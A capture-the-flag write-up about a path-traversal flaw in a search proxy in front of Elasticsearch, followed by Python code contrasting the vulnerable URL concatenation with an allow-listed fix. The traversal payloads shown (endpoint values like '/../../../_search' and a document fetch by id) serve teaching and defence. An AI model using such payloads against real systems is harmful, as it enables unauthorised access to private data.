Searching for anything on the page makes a POST request to /action.
Fiddling around with the endpoint, an error appears very quickly.
Searching for the error made it clear that Elasticsearch was being used.
After reading the API docs and looking at the request again, it looked like the value of the endpoint parameter is prefixed with _, so endpoint:search results in /_search and the final query becomes /_search?q=, which is their Search API.
Some fuzzing on the endpoint led me to the conclusion that the URL can contain additional paths:
endpoint=/../../../_search
q=*
Now we need to know which index it is in:
endpoint=/../../../_cat/indices?v=#
index = secr3td4ta
_type = fl4g?
_id = AWoSY9h7LaY_ZeX1ck78
Fetching the document:
id=../../../secr3td4ta/fl4g%3f/AWoSY9h7LaY_ZeX1ck78
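The root cause and its fix, as an added example that is not from the original write-up or the challenge's code: it shows how the concatenation described above resolves outside the intended path, and how a proxy can allow-list the endpoint value instead. The backend URL, the index/type names and the allowed endpoint set are assumptions.

```python
import posixpath
from urllib.parse import quote, urlsplit

# Assumed backend layout (hypothetical names): the proxy is meant to stay
# inside one index/type and only appends the API name after the underscore.
ES_BASE = "http://127.0.0.1:9200/public/articles/_"
ALLOWED_ENDPOINTS = {"search", "count"}  # assumed: the only APIs the UI needs


def naive_url(endpoint, q):
    """Vulnerable pattern inferred in the write-up: raw string concatenation."""
    return f"{ES_BASE}{endpoint}?q={q}"


def effective_path(url):
    """Path the backend acts on once dot-segments are resolved."""
    return posixpath.normpath(urlsplit(url).path)


def safe_url(endpoint, q):
    """Hardened form: exact allow-list match, percent-encoded query value."""
    if endpoint not in ALLOWED_ENDPOINTS:
        raise ValueError(f"endpoint not allowed: {endpoint!r}")
    url = f"{ES_BASE}{endpoint}?q={quote(q, safe='')}"
    # Defence in depth: the resolved path must stay under the intended prefix.
    if not effective_path(url).startswith(urlsplit(ES_BASE).path):
        raise ValueError("resolved path escapes the intended index")
    return url


if __name__ == "__main__":
    # Endpoint values taken from the write-up, plus the normal one.
    for ep in ("search", "/../../../_search", "/../../../_cat/indices?v=#"):
        url = naive_url(ep, "*")
        # A "#" in the value turns the appended "?q=" into a URL fragment,
        # so it never reaches the backend as a query string.
        print(f"{ep!r:32} naive -> {effective_path(url)}")
        try:
            print(f"{'':32} safe  -> {safe_url(ep, '*')}")
        except ValueError as exc:
            print(f"{'':32} safe  -> rejected ({exc})")
```

Restricting what the proxy's Elasticsearch account can read (only the public index, no _cat or cluster APIs) limits the impact even if input validation is bypassed.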